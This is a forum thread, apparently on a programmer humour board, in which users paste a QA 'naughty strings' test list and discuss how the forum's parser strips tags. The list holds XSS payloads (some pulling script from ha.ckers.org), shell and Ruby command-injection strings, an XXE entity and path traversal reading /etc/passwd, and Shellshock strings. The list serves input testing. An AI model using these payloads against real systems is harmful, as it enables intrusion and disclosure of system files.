QA engineer walks into a bar



  • http://www.sempf.net/post/On-Testing1.aspx

    via

    via


  • sockdevs

    Why does that look familiar?

    Thanks @yamikuronue for the suggestion to include that!



  • #	Human injection
    #
    #	Strings which may cause human to reinterpret worldview
    
    If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
    

    Heh.

    Anyway, it's good to have a nice list of XSS vectors for Disc... I mean, totally unrelated activities.



  • Well it's worth a try.
    # Special Characters

    ,./;'[]-=
    <>?:"{}|_+
    !@#$%^&*()`~

    # Unicode Symbols

    Ω≈ç√∫˜µ≤≥÷
    åß∂ƒ©˙∆˚¬…æ
    œ∑´®†¥¨ˆøπ“‘
    ¡™£¢∞§¶•ªº–≠
    ¸˛Ç◊ı˜Â¯˘¿
    ÅÍÎÏ˝ÓÔÒÚÆ☃
    Œ„´‰ˇÁ¨ˆØ∏”’
    `⁄€‹›fifl‡°·‚—±
    ⅛⅜⅝⅞
    ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
    ٠١٢٣٤٥٦٧٨٩

    # Unicode Subscript/Superscript

    ⁰⁴⁵
    ₀₁₂
    ⁰⁴⁵₀₁₂

    # Quotation Marks

    '
    "
    ''
    ""
    '"'
    "''''"'"
    "'"'"''''"

    # Two-Byte Characters

    田中さんにあげて下さい
    パーティーへ行かないか
    和製漢語
    部落格
    사회과학원 어학연구소
    찦차를 타고 온 펲시맨과 쑛다리 똠방각하
    社會科學院語學研究所
    울란바토르
    𠜎𠜱𠝹𠱓𠱸𠲖𠳏

    # Japanese Emoticons

    ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
    (。◕ ∀ ◕。)
    `ィ(´∀`∩
    _ロ(,,)
    ・( ̄∀ ̄)・:
    :
    ゚・✿ヾ╲(。◕‿◕。)╱✿・゚
    ,。・::・゜’( ☻ ω ☻ )。・::・゜’
    (╯°□°)╯︵ ┻━┻)
    (ノಥ益ಥ)ノ ┻━┻
    ( ͡° ͜ʖ ͡°)

    # Emoji

    😍
    👩🏽
    👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
    🐵 🙈 🙉 🙊
    ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
    ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
    🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
    0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟

    # Unicode Numbers

    123
    ١٢٣

    # Right-To-Left Strings

    ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
    בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
    הָיְתָהtestالصفحات التّحول

    # Unicode Spaces



    # Trick Unicode

    ‪‪test‪
    ‫test‫
    test
    test⁠test‫
    ⁦test⁧

    # Zalgo Text

    Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
    ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
    ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
    ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
    Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮

    # Unicode Upsidedown
    ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
    00˙Ɩ$-
    # Unicode font
    The quick brown fox jumps over the lazy dog
    𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠
    𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌
    𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈
    𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰
    𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘
    𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐
    ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
    # Script Injection

    <script>alert(123)</script>

    <script>alert('123');</script>

    <svg><script>123<1>alert(123)</script>
    "><script>alert(123)</script>
    '><script>alert(123)</script>

    <script>alert(123)</script>

    </script><script>alert(123)</script>
    < / script >< script >alert(123)< / script >
    onfocus=JaVaSCript:alert(123) autofocus
    " onfocus=JaVaSCript:alert(123) autofocus
    ' onfocus=JaVaSCript:alert(123) autofocus
    <script>alert(123)</script>
    <sc<script>ript>alert(123)</sc</script>ript>
    --><script>alert(123)</script>
    ";alert(123);t="
    ';alert(123);t='
    JavaSCript:alert(123)
    ;alert(123);
    src=JaVaSCript:prompt(132)
    "><script>alert(123);</script x="
    '><script>alert(123);</script x='</p> <blockquote> <script>alert(123);</script x= </blockquote> <p>" autofocus onkeyup="javascript:alert(123)<br /> ' autofocus onkeyup='javascript:alert(123)<br /> <script\x20type="text/javascript">javascript:alert(1);</script><br /> <script\x3Etype="text/javascript">javascript:alert(1);</script><br /> <script\x0Dtype="text/javascript">javascript:alert(1);</script><br /> <script\x09type="text/javascript">javascript:alert(1);</script><br /> <script\x0Ctype="text/javascript">javascript:alert(1);</script><br /> <script\x2Ftype="text/javascript">javascript:alert(1);</script><br /> <script\x0Atype="text/javascript">javascript:alert(1);</script><br /> '<code>"><\x3Cscript>javascript:alert(1)</script> '</code>"><\x00script>javascript:alert(1)</script><br /> ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF<br /> ABC<div style="x:expression\x5C(javascript:alert(1)">DEF<br /> ABC<div style="x:expression\x00(javascript:alert(1)">DEF<br /> ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF<br /> ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF<br /> ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF<br /> ABC<div style="x:\x09expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF<br /> ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF<br /> ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF<br /> ABC<div style="x:\x20expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\x00expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF<br /> ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF<br /> <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a><br /> <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a><br /> <code>"'><img src=xxx:x \x0Aonerror=javascript:alert(1)></code>"'><img src=xxx:x \x22onerror=javascript:alert(1)><br /> <code>"'><img src=xxx:x \x0Bonerror=javascript:alert(1)></code>"'><img src=xxx:x \x0Donerror=javascript:alert(1)><br /> <code>"'><img src=xxx:x \x2Fonerror=javascript:alert(1)></code>"'><img src=xxx:x \x09onerror=javascript:alert(1)><br /> <code>"'><img src=xxx:x \x0Conerror=javascript:alert(1)></code>"'><img src=xxx:x \x00onerror=javascript:alert(1)><br /> <code>"'><img src=xxx:x \x27onerror=javascript:alert(1)></code>"'><img src=xxx:x \x20onerror=javascript:alert(1)><br /> "<code>'><script>\x3Bjavascript:alert(1)</script> "</code>'><script>\x0Djavascript:alert(1)</script><br /> "<code>'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "</code>'><script>\xE2\x80\x81javascript:alert(1)</script><br /> "<code>'><script>\xE2\x80\x84javascript:alert(1)</script> "</code>'><script>\xE3\x80\x80javascript:alert(1)</script><br /> "<code>'><script>\x09javascript:alert(1)</script> "</code>'><script>\xE2\x80\x89javascript:alert(1)</script><br /> "<code>'><script>\xE2\x80\x85javascript:alert(1)</script> "</code>'><script>\xE2\x80\x88javascript:alert(1)</script><br /> "<code>'><script>\x00javascript:alert(1)</script> "</code>'><script>\xE2\x80\xA8javascript:alert(1)</script><br /> "<code>'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "</code>'><script>\xE1\x9A\x80javascript:alert(1)</script><br /> "<code>'><script>\x0Cjavascript:alert(1)</script> "</code>'><script>\x2Bjavascript:alert(1)</script><br /> "<code>'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "</code>'><script>-javascript:alert(1)</script><br /> "<code>'><script>\x0Ajavascript:alert(1)</script> "</code>'><script>\xE2\x80\xAFjavascript:alert(1)</script><br /> "<code>'><script>\x7Ejavascript:alert(1)</script> "</code>'><script>\xE2\x80\x87javascript:alert(1)</script><br /> "<code>'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "</code>'><script>\xE2\x80\xA9javascript:alert(1)</script><br /> "<code>'><script>\xC2\x85javascript:alert(1)</script> "</code>'><script>\xEF\xBF\xAEjavascript:alert(1)</script><br /> "<code>'><script>\xE2\x80\x83javascript:alert(1)</script> "</code>'><script>\xE2\x80\x8Bjavascript:alert(1)</script><br /> "<code>'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "</code>'><script>\xE2\x80\x80javascript:alert(1)</script><br /> "<code>'><script>\x21javascript:alert(1)</script> "</code>'><script>\xE2\x80\x82javascript:alert(1)</script><br /> "<code>'><script>\xE2\x80\x86javascript:alert(1)</script> "</code>'><script>\xE1\xA0\x8Ejavascript:alert(1)</script><br /> "<code>'><script>\x0Bjavascript:alert(1)</script> "</code>'><script>\x20javascript:alert(1)</script><br /> "<code>'><script>\xC2\xA0javascript:alert(1)</script> <img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> <img src="x</code> <code><script>javascript:alert(1)</script>"</code> `><br /> <img src onerror /" '"= alt=javascript:alert(1)//"></p> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script --> <!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <script>alert("XSS")</script>"> perl -e 'print "";' > out <script xss="" src="http://ha.ckers.org/xss.js"></script> <script src="http://ha.ckers.org/xss.js"></script> <<script>alert("XSS");//<</script>

    [DATA EXPUNGED]

    <IMG SRC="javascript:alert('XSS')"
    ";alert('XSS');//

    # Server Code Injection

    --
    --version
    --help
    $USER
    /dev/null; touch /tmp/blns.fail ; echo
    touch /tmp/blns.fail
    $(touch /tmp/blns.fail)
    @{[system "touch /tmp/blns.fail"]}

    # Command Injection (Ruby)

    eval("puts 'hello world'")
    System("ls -al /")
    ls -al /
    Kernel.exec("ls -al /")
    Kernel.exit(1)
    %x('ls -al /')

    XXE Injection (XML)

    <!--?xml version="1.0" encoding="ISO-8859-1"?--><!--ENTITY xxe SYSTEM "file:///etc/passwd" -->]><foo>&xxe;</foo>

    # Unwanted Interpolation

    $HOME
    $ENV{'HOME'}
    %d
    %s
    %*.*s

    # File Inclusion

    ../../../../../../../../../../../etc/passwd%00
    ../../../../../../../../../../../etc/hosts

    # Known CVEs and Vulnerabilities

    # Strings that test for known vulnerabilities

    () { 0; }; touch /tmp/blns.shellshock1.fail;
    () { ; } >[$($())] { touch /tmp/blns.shellshock2.fail; }

    # Scunthorpe Problem

    Scunthorpe General Hospital
    Penistone Community Church
    Lightwater Country Park
    Jimmy Clitheroe
    Horniman Museum
    shitake mushrooms
    RomansInSussex.co.uk
    http://www.cum.qc.ca/
    Craig Cockburn, Software Specialist
    Linda Callahan
    Dr. Herman I. Libshitz
    magna cum laude
    Super Bowl XXX
    medieval erection of parapets
    evaluate
    mocha
    expression
    Arsenal canal
    classic
    Tyson Gay

    # Human injection

    If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
    # Terminal escape codes
    Roses are red, violets are blue. Hope you enjoy terminal hue
    But now...for my greatest trick...
    The quick brown fox... [Beeeep]
    # iOS Vulnerability
    Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗


  • sockdevs

    a post to let newlevator work through that wall o text





  • <iframe
    <script

    Well I found something, these lines stop the parser completely.

    Demo:

    <iframe <p>Hello? Anyone there?

    Hello?



  • <script

    Well, that is interesting.

    Does it also bypass the empty post check?


  • Impossible Mission Players - A

    <iframe d the boss
    and nobody will ever know...



  • Actually, I've just noticed it's not related to unclosed tag. Simply writing a valid <script> tag will cause the rest of the post to be silently ignored. It's a feature! Because all disallowed tags (and their contents) are ignored.

    OK, seriously, @codinghorror: have you ever read http://morethancoding.com/2011/07/02/yes-your-stupid-feature-is-still-a-bug/ ? Because it matches this "feature" to a T.

    You can't just strip out people's text because it happens to contain a < next to another character. Yes, I've seen it happen, someone writes something like x<y+1 (oh why is preformatted text not working now?) and then a few lines later y>0, the lines disappear and they don't notice. No user likes this behavior and no sane programmer would defend it.



  • @anonymous234 said:

    Scunthorpe Problem

    Scunthorpe General HospitalPenistone Community ChurchLightwater Country ParkJimmy ClitheroeHorniman Museumshitake mushroomsRomansInSussex.co.ukhttp://www.cum.qc.ca/Craig Cockburn, Software SpecialistLinda CallahanDr. Herman I. Libshitzmagna cum laudeSuper Bowl XXXmedieval erection of parapetsevaluatemochaexpressionArsenal canalclassicTyson Gay

    You forgot Dick Van Dyke.



  • PRs accepted.



  • I think that is what HTML Entities are for. That said, it would be nice if we did not have to explicitly type them.



  • The problem with this arises when users > 1.
    They might disagree, how do you fix that?





  • I'm not sure why you're replying to me. I have nothing to do with the project; I was just noting that the github page encourages PRs if you notice something you think should be included (with some exceptions: no strings containing \0, no strings >255 chars, and probably a couple of others I don't remember).



  • @anonymous234 said:

    If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

    =(



  • @HardwareGeek said:

    I'm not sure why you're replying to me.

    I invoke the transitive property of replies!



  • Lucky for me our users are limited to this



  • @Eldelshell said:

    Lucky for me our users are limited to this

    Our tv set is Internet capable. It is kinda hellish to enter a URL, but it works.

    CBA to try whether SQL or script injection would work if I tried it with the name of the owner of the device.


  • Discourse touched me in a no-no place

    @PWolff said:

    Our tv set is Internet capable. It is kinda hellish to enter a URL, but it works.

    No USB port for a keyword? bummer.

    My tv has internet too, and it does have a USB port but I've never used it except to plug in a flash drive to watch a video. Haven't tried a keyboard yet.



  • @FrostCat said:

    No USB port for a keywbord? bummer.

    I'll try that next time it'll be convenient.

    So far, I've used that device as an external monitor of my laptop, when I wanted to view Internet contents on it.



  • @da_Doctah said:

    shitake

    "Shit ache mushrooms?!"



  • <I'm pretty sure any post starting with < gets stripped regardless of tags...>I found <b'oobies>some more</butts> unusual behaviour </i'wat> in the tag parser, _quelle surprise_...
    and I broke Markdown


  • Impossible Mission Players - A

    Yes. Apparently code breaks Markdown. Actually, a whole lot of things break Markdown.
    ....
    There's no way You're New Here....,
    Something applies here, just can't figure out what...


    Filed under: nothing ever works as intended!



  • @Tsaukpaetra said:

    Apparently code breaks Markdown.

    Impossible.

    Because it, or at least Discourse's implementation of it, is broken to start with.



  • Its output for the empty string is correct.



  • @ben_lubar said:

    Its output for the empty string is correct.



  • .oi'o



  • Interesting list. Maybe I'm just slow, but why are these ones under the Scunthorpe Problem list? I can't work out what naughty-words filter would pick them up.

    Linda Callahan
    evaluate
    mocha
    expression


  • I survived the hour long Uno hand

    @Scarlet_Manuka said:

    Linda C allahan

    Islam filter?

    @Scarlet_Manuka said:

    evaluate

    Injection protection?





  • @FrostCat said:

    My tv has internet too, and it does have a USB port but I've never used it except to plug in a flash drive to watch a video. Haven't tried a keyboard yet.

    Mine has USB, but only works for a flash drive. I tried plugging in a keyboard but it was ignored. It's a Vizio. My in laws have a more expensive model that has a slide out keyboard in the remote. I have to use arrows to select letters. :cry:

    I logged into pandora once, but my email address and password are fairly long and its a real PITA. Fortunately, Netflix puts a code that you enter after logging in on your computer. Much nicer.


  • Discourse touched me in a no-no place

    @Scarlet_Manuka said:

    mocha
    expression

    Presumably because of historic censorship:

    In 2001, Yahoo! Mail erroneously changed words, including medireview in place of medieval. This was due to an email filter which automatically replaced Javascript-related strings with alternate versions, to prevent the possibility of cross-site scripting in HTML email. The filter would hyphenate the terms "Javascript", "Jscript", "Vbscript" and "Livescript", and replaced "eval", "mocha" and "expression" with the similar but not quite synonymous terms "review", "espresso" and "statement", respectively. Assumptions were involved in the writing of the filters: no attempts were made to limit these string replacements to script sections and attributes, or to respect word boundaries, in case this would leave some loopholes open



  • @PJH said:

    Buttumptions were involved in the writing of the filters

    FTFY



  • @PJH said:

    and replaced "eval", "mocha" and "expression" with the similar but not quite synonymous terms "review", "espresso" and "statement"

    The prreviewence of complaints of having delivered an espresso instead of a espresso brings a :wtf:y statement on my face.


  • Winner of the 2016 Presidential Election

    @PWolff said:

    Our tv set is Internet capable. It is kinda hellish to enter a URL, but it works.

    @boomzilla said:

    My in laws have a more expensive model that has a slide out keyboard in the remote. I have to use arrows to select letters. :cry:

    This is one my grandparents have:

    And yes, those are opposing sides of the same remote.



  • @anonymous234 said:

    You can't just strip out people's text because it happens to contain a < next to another character. Yes, I've seen it happen, someone writes something like x<y+1 (oh why is preformatted text not working now?) and then a few lines later y>0, the lines disappear and they don't notice. No user likes this behavior and no sane programmer would defend it.

    -----hmmm-----let's add something----
    You can't just strip out people's text because it happens to contain a < next to another character. Yes, I've seen it happen, someone writes something like x<y+1 (oh why is preformatted text not working now?) and then a few lines later y>0, the lines disappear and they don't notice. No user likes this behavior and no sane programmer would defend it.

    FTFY

    What I did should be rather obvious.



  • @Yamikuronue said:

    @Scarlet_Manuka said:
    evaluate

    Injection protection?

    :facepalm:



  • I don't know about 2001, but in 2007/2008 the e-commerce sites running my bespoke framework suffered from a (unsuccessful) spate of xss attacks - mainly because all the sites had consecutive IP's

    I done some extensive, empirical, testing which resulted in, essentially, one of the conclusion that if there was a space after the '<', then it was probably (treated as) a legitimate '<' or otherwise ignored.

    I have just run a simplified version of that specific test, and the conclusion still appears to be valid.

    Test Code used:

    <html>
